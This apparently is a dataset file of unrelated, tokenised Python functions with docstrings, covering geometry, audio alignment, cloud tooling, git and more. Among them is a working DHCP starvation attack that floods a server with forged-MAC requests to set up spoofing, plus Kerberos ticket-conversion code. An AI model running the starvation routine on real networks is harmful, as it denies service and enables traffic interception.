m34 = ( c * ( u2 + v2 ) - w * ( a * u + b * v ) + ( w * ( a * u + b * v ) - c * ( u2 + v2 ) ) * cos_t + ( a * v - b * u ) * l * sin_t ) / l2
return SymmOp ( [ [ m11 , m12 , m13 , m14 ] , [ m21 , m22 , m23 , m24 ] , [ m31 , m32 , m33 , m34 ] , [ 0 , 0 , 0 , 1 ] ] )
|
def attribute ( self ) :
"""Attribute that serves as a reference getter"""
|
refs = re . findall ( "\@([a-zA-Z:]+)=\\\?[\'\"]\$" + str ( self . refsDecl . count ( "$" ) ) + "\\\?[\'\"]" , self . refsDecl )
return refs [ - 1 ]
|
def _restore ( name , fields , value ) :
"""Restore an object of namedtuple"""
|
k = ( name , fields )
cls = __cls . get ( k )
if cls is None :
cls = collections . namedtuple ( name , fields )
__cls [ k ] = cls
return cls ( * value )
|
def unlock ( arguments ) :
"""Unlock the database ."""
|
import redis
u = coil . utils . ask ( "Redis URL" , "redis://localhost:6379/0" )
db = redis . StrictRedis . from_url ( u )
db . set ( 'site:lock' , 0 )
print ( "Database unlocked." )
return 0
|
def _detect ( self , min_length , max_length , tail = False ) :
"""Detect the head or tail within ` ` min _ length ` ` and ` ` max _ length ` ` duration .
If detecting the tail , the real wave MFCC and the query are reversed
so that the tail detection problem reduces to a head detection problem .
Return the duration of the head or tail , in seconds .
: param min _ length : estimated minimum length
: type min _ length : : class : ` ~ aeneas . exacttiming . TimeValue `
: param max _ length : estimated maximum length
: type max _ length : : class : ` ~ aeneas . exacttiming . TimeValue `
: rtype : : class : ` ~ aeneas . exacttiming . TimeValue `
: raises : TypeError : if one of the parameters is not ` ` None ` ` or a number
: raises : ValueError : if one of the parameters is negative"""
|
def _sanitize ( value , default , name ) :
if value is None :
value = default
try :
value = TimeValue ( value )
except ( TypeError , ValueError , InvalidOperation ) as exc :
self . log_exc ( u"The value of %s is not a number" % ( name ) , exc , True , TypeError )
if value < 0 :
self . log_exc ( u"The value of %s is negative" % ( name ) , None , True , ValueError )
return value
min_length = _sanitize ( min_length , self . MIN_LENGTH , "min_length" )
max_length = _sanitize ( max_length , self . MAX_LENGTH , "max_length" )
mws = self . rconf . mws
min_length_frames = int ( min_length / mws )
max_length_frames = int ( max_length / mws )
self . log ( [ u"MFCC window shift s: %.3f" , mws ] )
self . log ( [ u"Min start length s: %.3f" , min_length ] )
self . log ( [ u"Min start length frames: %d" , min_length_frames ] )
self . log ( [ u"Max start length s: %.3f" , max_length ] )
self . log ( [ u"Max start length frames: %d" , max_length_frames ] )
self . log ( [ u"Tail?: %s" , str ( tail ) ] )
self . log ( u"Synthesizing query..." )
synt_duration = max_length * self . QUERY_FACTOR
self . log ( [ u"Synthesizing at least %.3f seconds" , synt_duration ] )
tmp_handler , tmp_file_path = gf . tmp_file ( suffix = u".wav" , root = self . rconf [ RuntimeConfiguration . TMP_PATH ] )
synt = Synthesizer ( rconf = self . rconf , logger = self . logger )
anchors , total_time , synthesized_chars = synt . synthesize ( self . text_file , tmp_file_path , quit_after = synt_duration , backwards = tail )
self . log ( u"Synthesizing query... done" )
self . log ( u"Extracting MFCCs for query..." )
query_mfcc = AudioFileMFCC ( tmp_file_path , rconf = self . rconf , logger = self . logger )
self . log ( u"Extracting MFCCs for query... done" )
self . log ( u"Cleaning up..." )
gf . delete_file ( tmp_handler , tmp_file_path )
self . log ( u"Cleaning up... done" )
search_window = max_length * self . AUDIO_FACTOR
search_window_end = min ( int ( search_window / mws ) , self . real_wave_mfcc . all_length )
self . log ( [ u"Query MFCC length (frames): %d" , query_mfcc . all_length ] )
self . log ( [ u"Real MFCC length (frames): %d" , self . real_wave_mfcc . all_length ] )
self . log ( [ u"Search window end (s): %.3f" , search_window ] )
self . log ( [ u"Search window end (frames): %d" , search_window_end ] )
if tail :
self . log ( u"Tail => reversing real_wave_mfcc and query_mfcc" )
self . real_wave_mfcc . reverse ( )
query_mfcc . reverse ( )
# NOTE : VAD will be run here , if not done before
speech_intervals = self . real_wave_mfcc . intervals ( speech = True , time = False )
if len ( speech_intervals ) < 1 :
self . log ( u"No speech intervals, hence no start found" )
if tail :
self . real_wave_mfcc . reverse ( )
return TimeValue ( "0.000" )
# generate a list of begin indices
search_end = None
candidates_begin = [ ]
for interval in speech_intervals :
if ( interval [ 0 ] >= min_length_frames ) and ( interval [ 0 ] <= max_length_frames ) :
candidates_begin . append ( interval [ 0 ] )
search_end = interval [ 1 ]
if search_end >= search_window_end :
break
# for each begin index , compute the acm cost
# to match the query
# note that we take the min over the last column of the acm
# meaning that we allow to match the entire query wave
# against a portion of the real wave
candidates = [ ]
for candidate_begin in candidates_begin :
self . log ( [ u"Candidate interval starting at %d == %.3f" , candidate_begin , candidate_begin * mws ] )
try :
rwm = AudioFileMFCC ( mfcc_matrix = self . real_wave_mfcc . all_mfcc [ : , candidate_begin : search_end ] , rconf = self . rconf , logger = self . logger )
dtw = DTWAligner ( real_wave_mfcc = rwm , synt_wave_mfcc = query_mfcc , rconf = self . rconf , logger = self . logger )
acm = dtw . compute_accumulated_cost_matrix ( )
last_column = acm [ : , - 1 ]
min_value = numpy . min ( last_column )
min_index = numpy . argmin ( last_column )
self . log ( [ u"Candidate interval: %d %d == %.3f %.3f" , candidate_begin , search_end , candidate_begin * mws , search_end * mws ] )
self . log ( [ u" Min value: %.6f" , min_value ] )
self . log ( [ u" Min index: %d == %.3f" , min_index , min_index * mws ] )
candidates . append ( ( min_value , candidate_begin , min_index ) )
except Exception as exc :
self . log_exc ( u"An unexpected error occurred while running _detect" , exc , False , None )
# reverse again the real wave
if tail :
self . log ( u"Tail => reversing real_wave_mfcc again" )
self . real_wave_mfcc . reverse ( )
# return
if len ( candidates ) < 1 :
self . log ( u"No candidates found" )
return TimeValue ( "0.000" )
self . log ( u"Candidates:" )
for candidate in candidates :
self . log ( [ u" Value: %.6f Begin Time: %.3f Min Index: %d" , candidate [ 0 ] , candidate [ 1 ] * mws , candidate [ 2 ] ] )
best = sorted ( candidates ) [ 0 ] [ 1 ]
self . log ( [ u"Best candidate: %d == %.3f" , best , best * mws ] )
return best * mws
|
def run_script ( config , output_dir , accounts , tags , region , echo , serial , script_args ) :
"""run an aws script across accounts"""
|
# TODO count up on success / error / error list by account
accounts_config , custodian_config , executor = init ( config , None , serial , True , accounts , tags , ( ) , ( ) )
if echo :
print ( "command to run: `%s`" % ( " " . join ( script_args ) ) )
return
# Support fully quoted scripts , which are common to avoid parameter
# overlap with c7n - org run - script .
if len ( script_args ) == 1 and " " in script_args [ 0 ] :
script_args = script_args [ 0 ] . split ( )
with executor ( max_workers = WORKER_COUNT ) as w :
futures = { }
for a in accounts_config . get ( 'accounts' , ( ) ) :
for r in resolve_regions ( region or a . get ( 'regions' , ( ) ) ) :
futures [ w . submit ( run_account_script , a , r , output_dir , serial , script_args ) ] = ( a , r )
for f in as_completed ( futures ) :
a , r = futures [ f ]
if f . exception ( ) :
if serial :
raise
log . warning ( "Error running script in %s @ %s exception: %s" , a [ 'name' ] , r , f . exception ( ) )
exit_code = f . result ( )
if exit_code == 0 :
log . info ( "ran script on account:%s region:%s script: `%s`" , a [ 'name' ] , r , " " . join ( script_args ) )
else :
log . info ( "error running script on account:%s region:%s script: `%s`" , a [ 'name' ] , r , " " . join ( script_args ) )
|
def changeHS ( self ) :
"""Change health system interventions
https : / / github . com / SwissTPH / openmalaria / wiki / GeneratedSchema32Doc # change - health - system
Returns : list of HealthSystems together with timestep when they are applied"""
|
health_systems = [ ]
change_hs = self . et . find ( "changeHS" )
if change_hs is None :
return health_systems
for health_system in change_hs . findall ( "timedDeployment" ) :
health_systems . append ( [ int ( health_system . attrib ( "time" ) ) , HealthSystem ( self . et ) ] )
return health_systems
|
def _get_colors ( self , color_set , alpha , off_color , custom_colors = { } ) :
"""assign colors according to the surface energies of on _ wulff facets .
return :
( color _ list , color _ proxy , color _ proxy _ on _ wulff , miller _ on _ wulff ,
e _ surf _ on _ wulff _ list )"""
|
import matplotlib as mpl
import matplotlib . pyplot as plt
color_list = [ off_color ] * len ( self . hkl_list )
color_proxy_on_wulff = [ ]
miller_on_wulff = [ ]
e_surf_on_wulff = [ ( i , e_surf ) for i , e_surf in enumerate ( self . e_surf_list ) if self . on_wulff [ i ] ]
c_map = plt . get_cmap ( color_set )
e_surf_on_wulff . sort ( key = lambda x : x [ 1 ] , reverse = False )
e_surf_on_wulff_list = [ x [ 1 ] for x in e_surf_on_wulff ]
if len ( e_surf_on_wulff ) > 1 :
cnorm = mpl . colors . Normalize ( vmin = min ( e_surf_on_wulff_list ) , vmax = max ( e_surf_on_wulff_list ) )
else : # if there is only one hkl on wulff , choose the color of the median
cnorm = mpl . colors . Normalize ( vmin = min ( e_surf_on_wulff_list ) - 0.1 , vmax = max ( e_surf_on_wulff_list ) + 0.1 )
scalar_map = mpl . cm . ScalarMappable ( norm = cnorm , cmap = c_map )
for i , e_surf in e_surf_on_wulff :
color_list [ i ] = scalar_map . to_rgba ( e_surf , alpha = alpha )
if tuple ( self . miller_list [ i ] ) in custom_colors . keys ( ) :
color_list [ i ] = custom_colors [ tuple ( self . miller_list [ i ] ) ]
color_proxy_on_wulff . append ( plt . Rectangle ( ( 2 , 2 ) , 1 , 1 , fc = color_list [ i ] , alpha = alpha ) )
miller_on_wulff . append ( self . input_miller_fig [ i ] )
scalar_map . set_array ( [ x [ 1 ] for x in e_surf_on_wulff ] )
color_proxy = [ plt . Rectangle ( ( 2 , 2 ) , 1 , 1 , fc = x , alpha = alpha ) for x in color_list ]
return color_list , color_proxy , color_proxy_on_wulff , miller_on_wulff , e_surf_on_wulff_list
|
def get_self_uri ( self , content_type ) :
"return the first self uri with the content _ type"
|
try :
return [ self_uri for self_uri in self . self_uri_list if self_uri . content_type == content_type ] [ 0 ]
except IndexError :
return None
|
def text_to_speech ( text , synthesizer , synth_args , sentence_break ) :
"""Converts given text to a pydub AudioSegment using a specified speech
synthesizer . At the moment , IBM Watson ' s text - to - speech API is the only
available synthesizer .
: param text :
The text that will be synthesized to audio .
: param synthesizer :
The text - to - speech synthesizer to use . At the moment , ' watson ' is the
only available input .
: param synth _ args :
A dictionary of arguments to pass to the synthesizer . Parameters for
authorization ( username / password ) should be passed here .
: param sentence _ break :
A string that identifies a sentence break or another logical break in
the text . Necessary for text longer than 50 words . Defaults to ' . ' ."""
|
if len ( text . split ( ) ) < 50 :
if synthesizer == 'watson' :
with open ( '.temp.wav' , 'wb' ) as temp :
temp . write ( watson_request ( text = text , synth_args = synth_args ) . content )
response = AudioSegment . from_wav ( '.temp.wav' )
os . remove ( '.temp.wav' )
return response
else :
raise ValueError ( '"' + synthesizer + '" synthesizer not found.' )
else :
segments = [ ]
for i , sentence in enumerate ( text . split ( sentence_break ) ) :
if synthesizer == 'watson' :
with open ( '.temp' + str ( i ) + '.wav' , 'wb' ) as temp :
temp . write ( watson_request ( text = sentence , synth_args = synth_args ) . content )
segments . append ( AudioSegment . from_wav ( '.temp' + str ( i ) + '.wav' ) )
os . remove ( '.temp' + str ( i ) + '.wav' )
else :
raise ValueError ( '"' + synthesizer + '" synthesizer not found.' )
response = segments [ 0 ]
for segment in segments [ 1 : ] :
response = response + segment
return response
|
def check_need_install ( ) :
"""Check if installed package are exactly the same to this one .
By checking md5 value of all files ."""
|
need_install_flag = False
for root , _ , basename_list in os . walk ( SRC ) :
if os . path . basename ( root ) != "__pycache__" :
for basename in basename_list :
src = os . path . join ( root , basename )
dst = os . path . join ( root . replace ( SRC , DST ) , basename )
if os . path . exists ( dst ) :
if md5_of_file ( src ) != md5_of_file ( dst ) :
return True
else :
return True
return need_install_flag
|
def func_globals_inject ( func , ** overrides ) :
'''Override specific variables within a function ' s global context .'''
|
# recognize methods
if hasattr ( func , 'im_func' ) :
func = func . __func__
# Get a reference to the function globals dictionary
func_globals = func . __globals__
# Save the current function globals dictionary state values for the
# overridden objects
injected_func_globals = [ ]
overridden_func_globals = { }
for override in overrides :
if override in func_globals :
overridden_func_globals [ override ] = func_globals [ override ]
else :
injected_func_globals . append ( override )
# Override the function globals with what ' s passed in the above overrides
func_globals . update ( overrides )
# The context is now ready to be used
yield
# We ' re now done with the context
# Restore the overwritten function globals
func_globals . update ( overridden_func_globals )
# Remove any entry injected in the function globals
for injected in injected_func_globals :
del func_globals [ injected ]
|
def zone_delete ( name , resource_group , ** kwargs ) :
'''. . versionadded : : Fluorine
Delete a DNS zone within a resource group .
: param name : The name of the DNS zone to delete .
: param resource _ group : The name of the resource group .
CLI Example :
. . code - block : : bash
salt - call azurearm _ dns . zone _ delete myzone testgroup'''
|
result = False
dnsconn = __utils__ [ 'azurearm.get_client' ] ( 'dns' , ** kwargs )
try :
zone = dnsconn . zones . delete ( zone_name = name , resource_group_name = resource_group , if_match = kwargs . get ( 'if_match' ) )
zone . wait ( )
result = True
except CloudError as exc :
__utils__ [ 'azurearm.log_cloud_error' ] ( 'dns' , str ( exc ) , ** kwargs )
return result
|
def In ( self , * values ) :
"""Sets the type of the WHERE clause as " in " .
Args :
* values : The values to be used in the WHERE condition .
Returns :
The query builder that this WHERE builder links to ."""
|
self . _awql = self . _CreateMultipleValuesCondition ( values , 'IN' )
return self . _query_builder
|
def createArgumentParser ( description ) :
"""Create an argument parser"""
|
parser = argparse . ArgumentParser ( description = description , formatter_class = SortedHelpFormatter )
return parser
|
def call ( self , command , * args ) :
"""Passes an arbitrary command to the coin daemon .
Args :
command ( str ) : command to be sent to the coin daemon"""
|
return self . rpc . call ( str ( command ) , * args )
|
def store_password ( params , password ) :
"""Store the password for a database connection using : mod : ` keyring `
Use the ` ` user ` ` field as the user name and ` ` < host > : < driver > ` ` as service name .
Args :
params ( dict ) : database configuration , as defined in : mod : ` ozelot . config `
password ( str ) : password to store"""
|
user_name = params [ 'user' ]
service_name = params [ 'host' ] + ':' + params [ 'driver' ]
keyring . set_password ( service_name = service_name , username = user_name , password = password )
|
def get_default ( self , section , option ) :
"""Get Default value for a given ( section , option )
- > useful for type checking in ' get ' method"""
|
section = self . _check_section_option ( section , option )
for sec , options in self . defaults :
if sec == section :
if option in options :
return options [ option ]
else :
return NoDefault
|
def _proxy ( self ) :
"""Generate an instance context for the instance , the context is capable of
performing various actions . All instance actions are proxied to the context
: returns : FlowContext for this FlowInstance
: rtype : twilio . rest . studio . v1 . flow . FlowContext"""
|
if self . _context is None :
self . _context = FlowContext ( self . _version , sid = self . _solution [ 'sid' ] , )
return self . _context
|
def decode_tag ( stream ) :
"""Decode a tag value from a serialized stream .
: param stream : Source data stream
: type stream : io . BytesIO
: returns : Decoded tag
: rtype : bytes"""
|
( reserved , tag ) = unpack_value ( ">cc" , stream )
if reserved != b"\x00" :
raise DeserializationError ( "Invalid tag: reserved byte is not null" )
return tag
|
def add_kirbi ( self , krbcred , override_pp = True , include_expired = False ) :
c = Credential ( )
enc_credinfo = EncKrbCredPart . load ( krbcred [ 'enc-part' ] [ 'cipher' ] ) . native
ticket_info = enc_credinfo [ 'ticket-info' ] [ 0 ]
"""if ticket _ info [ ' endtime ' ] < datetime . datetime . now ( datetime . timezone . utc ) :
if include _ expired = = True :
logging . debug ( ' This ticket has most likely expired , but include _ expired is forcing me to add it to cache ! This can cause problems ! ' )
else :
logging . debug ( ' This ticket has most likely expired , skipping ' )
return"""
|
c . client = CCACHEPrincipal . from_asn1 ( ticket_info [ 'pname' ] , ticket_info [ 'prealm' ] )
if override_pp == True :
self . primary_principal = c . client
# yaaaaay 4 additional weirdness ! ! ! !
# if sname name - string contains a realm as well htne impacket will crash miserably : (
if len ( ticket_info [ 'sname' ] [ 'name-string' ] ) > 2 and ticket_info [ 'sname' ] [ 'name-string' ] [ - 1 ] . upper ( ) == ticket_info [ 'srealm' ] . upper ( ) :
logging . debug ( 'SNAME contains the realm as well, trimming it' )
t = ticket_info [ 'sname' ]
t [ 'name-string' ] = t [ 'name-string' ] [ : - 1 ]
c . server = CCACHEPrincipal . from_asn1 ( t , ticket_info [ 'srealm' ] )
else :
c . server = CCACHEPrincipal . from_asn1 ( ticket_info [ 'sname' ] , ticket_info [ 'srealm' ] )
c . time = Times . from_asn1 ( ticket_info )
c . key = Keyblock . from_asn1 ( ticket_info [ 'key' ] )
c . is_skey = 0
# not sure !
c . tktflags = TicketFlags ( ticket_info [ 'flags' ] ) . cast ( core . IntegerBitString ) . native
c . num_address = 0
c . num_authdata = 0
c . ticket = CCACHEOctetString . from_asn1 ( Ticket ( krbcred [ 'tickets' ] [ 0 ] ) . dump ( ) )
# kirbi only stores one ticket per file
c . second_ticket = CCACHEOctetString . empty ( )
self . credentials . append ( c )
|
def cmd_dhcp_starvation ( iface , timeout , sleeptime , verbose ) :
"""Send multiple DHCP requests from forged MAC addresses to
fill the DHCP server leases .
When all the available network addresses are assigned , the DHCP server don ' t send responses .
So , some attacks , like DHCP spoofing , can be made .
# habu . dhcp _ starvation
Ether / IP / UDP 192.168.0.1 : bootps > 192.168.0.6 : bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1 : bootps > 192.168.0.7 : bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1 : bootps > 192.168.0.8 : bootpc / BOOTP / DHCP"""
|
conf . verb = False
if iface :
conf . iface = iface
conf . checkIPaddr = False
ether = Ether ( dst = "ff:ff:ff:ff:ff:ff" )
ip = IP ( src = "0.0.0.0" , dst = "255.255.255.255" )
udp = UDP ( sport = 68 , dport = 67 )
dhcp = DHCP ( options = [ ( "message-type" , "discover" ) , "end" ] )
while True :
bootp = BOOTP ( chaddr = str ( RandMAC ( ) ) )
dhcp_discover = ether / ip / udp / bootp / dhcp
ans , unans = srp ( dhcp_discover , timeout = 1 )
# Press CTRL - C after several seconds
for _ , pkt in ans :
if verbose :
print ( pkt . show ( ) )
else :
print ( pkt . sprintf ( r"%IP.src% offers %BOOTP.yiaddr%" ) )
sleep ( sleeptime )
|
def text_to_url ( self , text ) :
"""Convert text address into QUrl object"""
|
if text . startswith ( '/' ) :
text = text [ 1 : ]
return QUrl ( self . home_url . toString ( ) + text + '.html' )
|
def commit ( self , message , parent_commits = None , head = True , author = None , committer = None , author_date = None , commit_date = None , skip_hooks = False ) :
"""Commit the current default index file , creating a commit object .
For more information on the arguments , see tree . commit .
: note : If you have manually altered the . entries member of this instance ,
don ' t forget to write ( ) your changes to disk beforehand .
Passing skip _ hooks = True is the equivalent of using ` - n `
or ` - - no - verify ` on the command line .
: return : Commit object representing the new commit"""
|
if not skip_hooks :
run_commit_hook ( 'pre-commit' , self )
self . _write_commit_editmsg ( message )
run_commit_hook ( 'commit-msg' , self , self . _commit_editmsg_filepath ( ) )
message = self . _read_commit_editmsg ( )
self . _remove_commit_editmsg ( )
tree = self . write_tree ( )
rval = Commit . create_from_tree ( self . repo , tree , message , parent_commits , head , author = author , committer = committer , author_date = author_date , commit_date = commit_date )
if not skip_hooks :
run_commit_hook ( 'post-commit' , self )
return rval
|
def loadSettings ( self ) :
"""Load window state from self . settings"""
|
self . settings . beginGroup ( 'rampviewer' )
geometry = self . settings . value ( 'geometry' ) . toByteArray ( )
self . settings . endGroup ( )
self . restoreGeometry ( geometry )
|
def main ( ) :
"""Entry point when module is run from command line"""
|
parser = argparse . ArgumentParser ( description = 'Run the chaid algorithm on a' ' csv/sav file.' )
parser . add_argument ( 'file' )
parser . add_argument ( 'dependent_variable' , nargs = 1 )
parser . add_argument ( '--dependent-variable-type' , type = str )
var = parser . add_argument_group ( 'Independent Variable Specification' )
var . add_argument ( 'nominal_variables' , nargs = '*' , help = 'The names of ' 'independent variables to use that have no intrinsic ' 'order to them' )
var . add_argument ( '--ordinal-variables' , type = str , nargs = '*' , help = 'The names of independent variables to use that ' 'have an intrinsic order but a finite amount of states' )
parser . add_argument ( '--weights' , type = str , help = 'Name of weight column' )
parser . add_argument ( '--max-depth' , type = int , help = 'Max depth of generated ' 'tree' )
parser . add_argument ( '--min-parent-node-size' , type = int , help = 'Minimum number of ' 'samples required to split the parent node' )
parser . add_argument ( '--min-child-node-size' , type = int , help = 'Minimum number of ' 'samples required to split the child node' )
parser . add_argument ( '--alpha-merge' , type = float , help = 'Alpha Merge' )
group = parser . add_mutually_exclusive_group ( required = False )
group . add_argument ( '--classify' , action = 'store_true' , help = 'Add column to' ' input with the node id of the node that that ' 'respondent has been placed into' )
group . add_argument ( '--predict' , action = 'store_true' , help = 'Add column to ' 'input with the value of the dependent variable that ' 'the majority of respondents in that node selected' )
group . add_argument ( '--rules' , action = 'store_true' )
group . add_argument ( '--export' , action = 'store_true' , help = 'Whether to export the chart to pdf/dot' )
group . add_argument ( '--export-path' , type = str , help = 'Path to store chart output' )
nspace = parser . parse_args ( )
if nspace . file [ - 4 : ] == '.csv' :
data = pd . read_csv ( nspace . file )
elif nspace . file [ - 4 : ] == '.sav' :
import savReaderWriter as spss
raw_data = spss . SavReader ( nspace . file , returnHeader = True )
raw_data_list = list ( raw_data )
data = pd . DataFrame ( raw_data_list )
data = data . rename ( columns = data . loc [ 0 ] ) . iloc [ 1 : ]
else :
print ( 'Unknown file type' )
exit ( 1 )
config = { }
if nspace . max_depth :
config [ 'max_depth' ] = nspace . max_depth
if nspace . alpha_merge :
config [ 'alpha_merge' ] = nspace . alpha_merge
if nspace . min_parent_node_size :
config [ 'min_parent_node_size' ] = nspace . min_parent_node_size
if nspace . min_child_node_size :
config [ 'min_child_node_size' ] = nspace . min_child_node_size
if nspace . weights :
config [ 'weight' ] = nspace . weights
if nspace . dependent_variable_type :
config [ 'dep_variable_type' ] = nspace . dependent_variable_type
ordinal = nspace . ordinal_variables or [ ]
nominal = nspace . nominal_variables or [ ]
independent_variables = nominal + ordinal
types = dict ( zip ( nominal + ordinal , [ 'nominal' ] * len ( nominal ) + [ 'ordinal' ] * len ( ordinal ) ) )
if len ( independent_variables ) == 0 :
print ( 'Need to provide at least one independent variable' )
exit ( 1 )
tree = Tree . from_pandas_df ( data , types , nspace . dependent_variable [ 0 ] , ** config )
if nspace . export or nspace . export_path :
tree . render ( nspace . export_path , True )
if nspace . classify :
predictions = pd . Series ( tree . node_predictions ( ) )
predictions . name = 'node_id'
data = pd . concat ( [ data , predictions ] , axis = 1 )
print ( data . to_csv ( ) )
elif nspace . predict :
predictions = pd . Series ( tree . model_predictions ( ) )
predictions . name = 'predicted'
data = pd . concat ( [ data , predictions ] , axis = 1 )
print ( data . to_csv ( ) )
elif nspace . rules :
print ( '\n' . join ( str ( x ) for x in tree . classification_rules ( ) ) )
else :
tree . print_tree ( )
print ( 'Accuracy: ' , tree . accuracy ( ) )
|
def update ( self , role_sid = values . unset , attributes = values . unset , friendly_name = values . unset ) :
"""Update the UserInstance
: param unicode role _ sid : The SID id of the Role assigned to this user
: param unicode attributes : A valid JSON string that contains application - specific data
: param unicode friendly _ name : A string to describe the resource
: returns : Updated UserInstance
: rtype : twilio . rest . chat . v2 . service . user . UserInstance"""
|
return self . _proxy . update ( role_sid = role_sid , attributes = attributes , friendly_name = friendly_name , )
|
def scopes ( self , ** kwargs ) :
"""Scopes associated to the team ."""
|
return self . _client . scopes ( team = self . id , ** kwargs )
|
def element_should_exist ( self , json_string , expr ) :
"""Check the existence of one or more elements , matching [ http : / / jsonselect . org / | JSONSelect ] expression .
* DEPRECATED * JSON Select query language is outdated and not supported any more .
Use other keywords of this library to query JSON .
* Args : * \n
_ json _ string _ - JSON string ; \n
_ expr _ - JSONSelect expression ; \n
* Raises : * \n
JsonValidatorError
* Example : * \n
| * Settings * | * Value * |
| Library | JsonValidator |
| Library | OperatingSystem |
| * Test Cases * | * Action * | * Argument * | * Argument * |
| Check element | $ { json _ example } = | OperatingSystem . Get File | $ { CURDIR } $ { / } json _ example . json |
| | Element should exist | $ { json _ example } | . author : contains ( " Evelyn Waugh " ) |
| | Element should exist | $ { json _ example } | . store . book . price : expr ( x = 8.95 ) |"""
|
value = self . select_elements ( json_string , expr )
if value is None :
raise JsonValidatorError ( 'Elements %s does not exist' % expr )
|
def generate ( organization , package , destination ) :
"""Generates the Sphinx configuration and Makefile .
Args :
organization ( str ) : the organization name .
package ( str ) : the package to be documented .
destination ( str ) : the destination directory ."""
|
gen = ResourceGenerator ( organization , package )
tmp = tempfile . NamedTemporaryFile ( mode = 'w+t' , delete = False )
try :
tmp . write ( gen . conf ( ) )
finally :
tmp . close ( )
shutil . copy ( tmp . name , os . path . join ( destination , 'conf.py' ) )
tmp = tempfile . NamedTemporaryFile ( mode = 'w+t' , delete = False )
try :
tmp . write ( gen . makefile ( ) )
finally :
tmp . close ( )
shutil . copy ( tmp . name , os . path . join ( destination , 'Makefile' ) )
|
def _to_dict ( self ) :
"""Return a json dictionary representing this model ."""
|
_dict = { }
if hasattr ( self , 'global_' ) and self . global_ is not None :
_dict [ 'global' ] = self . global_ . _to_dict ( )
if hasattr ( self , 'skills' ) and self . skills is not None :
_dict [ 'skills' ] = self . skills . _to_dict ( )
return _dict
|
def _method_ ( name ) :
"""getter factory"""
|
def _getter_ ( self ) :
return getattr ( self , self . get_private_name ( name ) )
return _getter_
|
def get_data ( name , train_batch_size , test_batch_size ) :
"""Gets training and testing dataset iterators .
Args :
name : String . Name of dataset , either ' mnist ' or ' cifar10 ' .
train _ batch _ size : Integer . Batch size for training .
test _ batch _ size : Integer . Batch size for testing .
Returns :
Dict containing :
train _ iterator : A tf . data . Iterator , over training data .
test _ iterator : A tf . data . Iterator , over test data .
num _ classes : Integer . Number of class labels ."""
|
if name not in [ 'mnist' , 'cifar10' ] :
raise ValueError ( 'Expected dataset \'mnist\' or \'cifar10\', but got %s' % name )
dataset = getattr ( tf . keras . datasets , name )
num_classes = 10
# Extract the raw data .
raw_data = dataset . load_data ( )
( images_train , labels_train ) , ( images_test , labels_test ) = raw_data
# Normalize inputs and fix types .
images_train = images_train . astype ( np . float32 ) / 255.
images_test = images_test . astype ( np . float32 ) / 255.
labels_train = labels_train . astype ( np . int32 ) . squeeze ( )
labels_test = labels_test . astype ( np . int32 ) . squeeze ( )
# Add a dummy ' color channel ' dimension if it is not present .
if images_train . ndim == 3 :
images_train = np . expand_dims ( images_train , - 1 )
images_test = np . expand_dims ( images_test , - 1 )
# Put the data onto the graph as constants .
train_data = tf . data . Dataset . from_tensor_slices ( ( images_train , labels_train ) )
test_data = tf . data . Dataset . from_tensor_slices ( ( images_test , labels_test ) )
# Create iterators for each dataset .
train_iterator = ( train_data # Note : For larger datasets e . g . ImageNet , it will not be feasible to have
# a shuffle buffer this large .
. shuffle ( buffer_size = len ( images_train ) ) . batch ( train_batch_size ) . repeat ( ) . make_one_shot_iterator ( ) )
test_iterator = test_data . batch ( test_batch_size ) . make_initializable_iterator ( )
return dict ( train_iterator = train_iterator , test_iterator = test_iterator , num_classes = num_classes )
|
def _parse_array ( value ) :
"""Coerce value into an list .
: param str value : Value to parse .
: returns : list or None if the value is not a JSON array
: raises : TypeError or ValueError if value appears to be an array but can ' t
be parsed as JSON ."""
|
value = value . lstrip ( )
if not value or value [ 0 ] not in _bracket_strings :
return None
return json . loads ( value )
|
def add_backend ( self , backend ) :
"Add a RapidSMS backend to this tenant"
|
if backend in self . get_backends ( ) :
return
backend_link , created = BackendLink . all_tenants . get_or_create ( backend = backend )
self . backendlink_set . add ( backend_link )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.